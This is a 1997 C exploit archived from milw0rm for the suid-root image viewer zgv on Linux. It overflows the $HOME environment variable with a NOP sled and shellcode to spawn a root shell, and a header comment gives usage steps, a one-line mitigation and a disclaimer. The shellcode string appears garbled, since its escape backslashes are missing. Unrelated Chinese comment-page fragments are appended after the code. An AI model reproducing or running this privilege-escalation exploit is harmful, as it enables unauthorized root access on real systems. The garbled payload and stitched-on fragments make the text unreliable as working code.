/*
*
* zgv exploit coded by BeastMaster V on June 20, 1997
*
* USAGE:
* For some strage reason, the filename length of this
* particular exploit must me one character long, otherwise you
* will be drop into a normal unpriviledged shell. Go Figure....
*
* $ cp zgv_exploit.c n.c
* $ cc -o n n.c
* $ ./n
* Oak driver: Unknown chipset (id = 0)
* bash#
*
* EXPLANATION: zgv (suid root) does not check bounds for $HOME env.
* TEMPORARY FIX: chmod u-s /usr/bin/zgv
* NOTE: Don't forget to visit http://www.rootshell.com for more exploits.
* DISCLAIMER: Please use this in a responsible manner.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shellcode =
"x31xc0xb0x31xcdx80x93x31xc0xb0x17xcdx80x68x59x58xffxe1"
"xffxd4x31xc0x99x89xcfxb0x2ex40xaex75xfdx89x39x89x51x04"
"x89xfbx40xaex75xfdx88x57xffxb0x0bxcdx80x31xc0x40x31xdb"
"xcdx80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 4096
char buffer[bufsize];
main() {
int i;
for (i = 0; i < bufsize - 4; i += 4)
*(char **)&buffer[i] = get_sp() -4675;
memset(buffer, 0x90, 512);
memcpy(&buffer[512], shellcode, strlen(shellcode));
buffer[bufsize - 1] = 0;
setenv("HOME", buffer, 1);
execl("/usr/bin/zgv", "/usr/bin/zgv", NULL);
}
// milw0rm.com [1997-06-20]
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666